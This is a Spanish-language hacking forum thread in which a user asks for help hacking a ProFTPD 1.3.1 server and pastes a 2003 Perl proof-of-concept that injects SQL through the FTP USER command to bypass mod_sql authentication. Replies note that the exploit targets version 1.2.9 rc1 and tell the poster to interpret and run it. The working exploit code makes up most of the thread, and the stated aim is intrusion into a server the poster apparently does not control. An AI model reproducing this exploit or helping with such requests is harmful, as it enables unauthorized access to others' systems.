Exploit Proftp

[cuban-hack]

me gustaria hackear un servidor
ProFTPD 1.3.1
pero no tengo idea de como empsar, me alludan

encontre exploit pero no se como se usa

Código:

#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if( @ARGC<2){
 print "\nProof Of Concept Sql Inject on ProFTPD\n";
 print "Usage: perl poc-sqlftp <target> [1=Alternate
query]\n\n";
 exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)

 or die "Can't connect. \n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
 print $remote "USER ')UNION
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
 print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash'
WHERE(''='\n";
};
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
 print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){ #logged in
 print "[------- Sql Inject Able \n";
}else{
 print "[------- Sql Inject Unable \n";
}
close $remote;

securitydot.net - 2003-06-19

[El Quemero]

Hay una seccion en el Foro.. soobre Exploit.. ahi podes aprende una cuantas cosas... y depsues por lo que vi...

Al server que queres atacar es la version: 1.3.1 y el exploit que vos mostras es para la version 1.2.9 rc1 asi que no creo que funcione ya en la 1.3.1

Otra cosa.. yo tengo cero ortografia pero "alludan" con "ll"?? aYudan..

[OzX]

es una inyecion sql... algo rara.. nunca habia visto una inyecion sql hacia un ftp...
ni idea...

intenta interpretarla.. y ejecutar el code.